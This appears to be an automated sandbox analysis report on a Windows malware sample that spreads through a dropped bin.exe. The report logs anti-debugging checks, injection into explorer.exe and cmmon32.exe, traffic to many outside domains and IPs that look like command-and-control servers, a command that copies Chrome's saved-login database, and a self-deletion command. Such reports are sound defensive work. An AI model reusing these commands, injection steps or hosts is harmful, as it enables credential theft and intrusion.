Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0181DBE9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B131B mov eax, dword ptr fs:[00000030h] 2_2_018B131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C8B58 mov eax, dword ptr fs:[00000030h] 2_2_018C8B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01823B7A mov eax, dword ptr fs:[00000030h] 2_2_01823B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01823B7A mov eax, dword ptr fs:[00000030h] 2_2_01823B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182D294 mov eax, dword ptr fs:[00000030h] 2_2_0182D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182D294 mov eax, dword ptr fs:[00000030h] 2_2_0182D294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0180AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0180AAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0182FAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9240 mov eax, dword ptr fs:[00000030h] 2_2_017F9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822ACB mov eax, dword ptr fs:[00000030h] 2_2_01822ACB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB14FB mov eax, dword ptr fs:[00000030h] 18_2_04FB14FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8B8D0 mov eax, dword ptr fs:[00000030h] 18_2_04F8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8CD6 mov eax, dword ptr fs:[00000030h] 18_2_04FC8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov ecx, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov eax, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2F0BF mov eax, dword ptr fs:[00000030h] 18_2_04F2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F390AF mov eax, dword ptr fs:[00000030h] 18_2_04F390AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9080 mov eax, dword ptr fs:[00000030h] 18_2_04EF9080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73884 mov eax, dword ptr fs:[00000030h] 18_2_04F73884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73884 mov eax, dword ptr fs:[00000030h] 18_2_04F73884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB2073 mov eax, dword ptr fs:[00000030h] 18_2_04FB2073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC1074 mov eax, dword ptr fs:[00000030h] 18_2_04FC1074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1746D mov eax, dword ptr fs:[00000030h] 18_2_04F1746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8C450 mov eax, dword ptr fs:[00000030h] 18_2_04F8C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8C450 mov eax, dword ptr fs:[00000030h] 18_2_04F8C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B02A mov eax, dword ptr fs:[00000030h] 18_2_04F0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2BC2C mov eax, dword ptr fs:[00000030h] 18_2_04F2BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F77016 mov eax, dword ptr fs:[00000030h] 18_2_04F77016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC4015 mov eax, dword ptr fs:[00000030h] 18_2_04FC4015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC4015 mov eax, dword ptr fs:[00000030h] 18_2_04FC4015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC740D mov eax, dword ptr fs:[00000030h] 18_2_04FC740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1C06 mov eax, dword ptr fs:[00000030h] 18_2_04FB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FA8DF1 mov eax, dword ptr fs:[00000030h] 18_2_04FA8DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB1E1 mov eax, dword ptr fs:[00000030h] 18_2_04EFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F235A1 mov eax, dword ptr fs:[00000030h] 18_2_04F235A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF2D8A mov eax, dword ptr fs:[00000030h] 18_2_04EF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2FD9B mov eax, dword ptr fs:[00000030h] 18_2_04F2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2FD9B mov eax, dword ptr fs:[00000030h] 18_2_04F2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C182 mov eax, dword ptr fs:[00000030h] 18_2_04F1C182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2A185 mov eax, dword ptr fs:[00000030h] 18_2_04F2A185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C577 mov eax, dword ptr fs:[00000030h] 18_2_04F1C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1C577 mov eax, dword ptr fs:[00000030h] 18_2_04F1C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB171 mov eax, dword ptr fs:[00000030h] 18_2_04EFB171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFB171 mov eax, dword ptr fs:[00000030h] 18_2_04EFB171
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F17D50 mov eax, dword ptr fs:[00000030h] 18_2_04F17D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F33D43 mov eax, dword ptr fs:[00000030h] 18_2_04F33D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1B944 mov eax, dword ptr fs:[00000030h] 18_2_04F1B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F1B944 mov eax, dword ptr fs:[00000030h] 18_2_04F1B944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F73540 mov eax, dword ptr fs:[00000030h] 18_2_04F73540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F03D34 mov eax, dword ptr fs:[00000030h] 18_2_04F03D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8D34 mov eax, dword ptr fs:[00000030h] 18_2_04FC8D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2513A mov eax, dword ptr fs:[00000030h] 18_2_04F2513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2513A mov eax, dword ptr fs:[00000030h] 18_2_04F2513A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F24D3B mov eax, dword ptr fs:[00000030h] 18_2_04F24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov eax, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 mov ecx, dword ptr fs:[00000030h] 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFAD30 mov eax, dword ptr fs:[00000030h] 18_2_04EFAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9100 mov eax, dword ptr fs:[00000030h] 18_2_04EF9100
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F216E0 mov ecx, dword ptr fs:[00000030h] 18_2_04F216E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F076E2 mov eax, dword ptr fs:[00000030h] 18_2_04F076E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8ED6 mov eax, dword ptr fs:[00000030h] 18_2_04FC8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAFEC0 mov eax, dword ptr fs:[00000030h] 18_2_04FAFEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F236CC mov eax, dword ptr fs:[00000030h] 18_2_04F236CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF52A5 mov eax, dword ptr fs:[00000030h] 18_2_04EF52A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F746A7 mov eax, dword ptr fs:[00000030h] 18_2_04F746A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC0EA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2D294 mov eax, dword ptr fs:[00000030h] 18_2_04F2D294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2D294 mov eax, dword ptr fs:[00000030h] 18_2_04F2D294
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FE87 mov eax, dword ptr fs:[00000030h] 18_2_04F8FE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3927A mov eax, dword ptr fs:[00000030h] 18_2_04F3927A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAB260 mov eax, dword ptr fs:[00000030h] 18_2_04FAB260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAB260 mov eax, dword ptr fs:[00000030h] 18_2_04FAB260
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0766D mov eax, dword ptr fs:[00000030h] 18_2_04F0766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF9240 mov eax, dword ptr fs:[00000030h] 18_2_04EF9240
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAFE3F mov eax, dword ptr fs:[00000030h] 18_2_04FAFE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFE620 mov eax, dword ptr fs:[00000030h] 18_2_04EFE620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFC600 mov eax, dword ptr fs:[00000030h] 18_2_04EFC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC5BA5 mov eax, dword ptr fs:[00000030h] 18_2_04FC5BA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB138A mov eax, dword ptr fs:[00000030h] 18_2_04FB138A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FAD380 mov ecx, dword ptr fs:[00000030h] 18_2_04FAD380
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F01B8F mov eax, dword ptr fs:[00000030h] 18_2_04F01B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F01B8F mov eax, dword ptr fs:[00000030h] 18_2_04F01B8F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFDB60 mov ecx, dword ptr fs:[00000030h] 18_2_04EFDB60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8F6A mov eax, dword ptr fs:[00000030h] 18_2_04FC8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC8B58 mov eax, dword ptr fs:[00000030h] 18_2_04FC8B58
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFDB40 mov eax, dword ptr fs:[00000030h] 18_2_04EFDB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0EF40 mov eax, dword ptr fs:[00000030h] 18_2_04F0EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFF358 mov eax, dword ptr fs:[00000030h] 18_2_04EFF358
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF4F2E mov eax, dword ptr fs:[00000030h] 18_2_04EF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF4F2E mov eax, dword ptr fs:[00000030h] 18_2_04EF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2E730 mov eax, dword ptr fs:[00000030h] 18_2_04F2E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB131B mov eax, dword ptr fs:[00000030h] 18_2_04FB131B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FF10 mov eax, dword ptr fs:[00000030h] 18_2_04F8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F8FF10 mov eax, dword ptr fs:[00000030h] 18_2_04F8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC070D mov eax, dword ptr fs:[00000030h] 18_2_04FC070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC070D mov eax, dword ptr fs:[00000030h] 18_2_04FC070D
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BA140 LdrLoadDll, 2_2_000BA140

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.4.45 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.2264a.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 134.122.201.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.siberup.xyz
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brandpay.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.96.186.204 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.liveafunday.xyz
Source: C:\Windows\explorer.exe Domain query: www.thepowerofanopenquestion.com
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.heavymettlelawyers.com
Source: C:\Windows\explorer.exe Domain query: www.o7oiwlp.xyz
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3968 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000004.00000000.376133769.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.418255803.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290738816.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000004.00000000.314875583.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366041881.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.290950319.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.376901277.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.353174181.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
